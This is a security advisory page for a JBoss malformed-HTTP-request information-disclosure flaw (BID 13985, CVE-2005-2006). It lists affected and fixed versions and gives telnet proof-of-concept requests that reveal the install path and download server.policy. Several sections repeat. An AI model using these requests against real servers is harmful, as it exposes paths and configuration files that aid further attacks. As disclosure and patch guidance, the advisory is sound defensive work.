JBoss Malformed HTTP Request Remote Information Disclosure Vulnerability
BID:13985
Info
JBoss Malformed HTTP Request Remote Information Disclosure Vulnerability
| Bugtraq ID: | 13985 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-2006 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 17 2005 12:00AM |
| Updated: | Jun 13 2008 11:22PM |
| Credit: | Discovery of this issue is credited to Marc Schoenefeld <[email protected]>. |
| Vulnerable: |
JBoss Group JBoss 4.0.2 JBoss Group JBoss 3.2.7 JBoss Group JBoss 3.2.5 JBoss Group JBoss 3.2.2 JBoss Group JBoss 3.2.1 JBoss Group JBoss 3.0.8 HP Systems Insight Manager 5.0 SP3 HP Systems Insight Manager 5.0 SP2 HP Systems Insight Manager 5.0 SP1 HP Systems Insight Manager 5.0 |
| Not Vulnerable: |
JBoss Group JBoss 4.0.3 JBoss Group JBoss 3.2.8 |
Discussion
JBoss Malformed HTTP Request Remote Information Disclosure Vulnerability
JBoss is prone to a remote information-disclosure vulnerability. The issue occurs in the 'org.jboss.web.WebServer' class and is due to a lack of sufficient sanitization of user-supplied request data.
Information that attackers can harvest through leveraging this issue may aid in further attacks against the affected service.
JBoss is prone to a remote information-disclosure vulnerability. The issue occurs in the 'org.jboss.web.WebServer' class and is due to a lack of sufficient sanitization of user-supplied request data.
Information that attackers can harvest through leveraging this issue may aid in further attacks against the affected service.
Exploit / POC
JBoss Malformed HTTP Request Remote Information Disclosure Vulnerability
No exploit is required, the following examples are available:
Example 1 (Installation path disclosure): [3.2.x and 4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %. HTTP/1.0
Reply:
HTTP/1.0 400 C:\Programme\jboss-4.0.2\server\default\conf (Zugriff
verweigert)
Content-Type: text/html
Example 2 (Config file download): [4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %server.policy HTTP/1.0
No exploit is required, the following examples are available:
Example 1 (Installation path disclosure): [3.2.x and 4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %. HTTP/1.0
Reply:
HTTP/1.0 400 C:\Programme\jboss-4.0.2\server\default\conf (Zugriff
verweigert)
Content-Type: text/html
Example 2 (Config file download): [4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %server.policy HTTP/1.0
Solution / Fix
JBoss Malformed HTTP Request Remote Information Disclosure Vulnerability
Solution:
Please see the referenced HP advisory for details on obtaining the appropriate updates.
Reports indicate that this issue has been resolved in JBoss 3.2.8 and 4.0.3.
Solution:
Please see the referenced HP advisory for details on obtaining the appropriate updates.
Reports indicate that this issue has been resolved in JBoss 3.2.8 and 4.0.3.
References
JBoss Malformed HTTP Request Remote Information Disclosure Vulnerability
References:
References: